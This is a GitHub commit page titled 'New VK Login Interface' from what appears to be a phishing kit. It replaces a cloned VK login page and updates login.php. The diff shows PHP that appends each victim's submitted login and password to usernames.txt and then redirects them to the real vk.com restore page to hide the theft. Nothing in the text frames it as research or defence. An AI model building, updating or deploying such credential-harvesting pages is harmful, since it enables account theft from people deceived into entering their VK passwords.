Skip to content

Commit fec7769

Browse files
committed
New VK Login Interface
1 parent f4dc7fc commit fec7769

11 files changed

+183
-365
lines changed

.sites/vk/b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download

Lines changed: 0 additions & 1 deletion
This file was deleted.

.sites/vk/b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download

Lines changed: 0 additions & 1 deletion
This file was deleted.

.sites/vk/common.6d5af9c51c7e29087e36.js.download

Lines changed: 0 additions & 1 deletion
This file was deleted.

.sites/vk/common.css

Lines changed: 0 additions & 170 deletions
This file was deleted.

.sites/vk/counter

-43 Bytes
Binary file not shown.

.sites/vk/favicon.png

5.43 KB
Loading

.sites/vk/login.html

Lines changed: 182 additions & 189 deletions
Large diffs are not rendered by default.

.sites/vk/login.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?php
22

3-
file_put_contents("usernames.txt", "Vk Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
3+
file_put_contents("usernames.txt", "Vk Username: " . $_POST['login'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
44
header('Location: https://vk.com/restore/');
55
exit();

.sites/vk/p

-43 Bytes
Binary file not shown.

.sites/vk/polyfills.c5f9a2ced681ad88809a.js.download

Lines changed: 0 additions & 1 deletion
This file was deleted.

0 commit comments

Comments
 (0)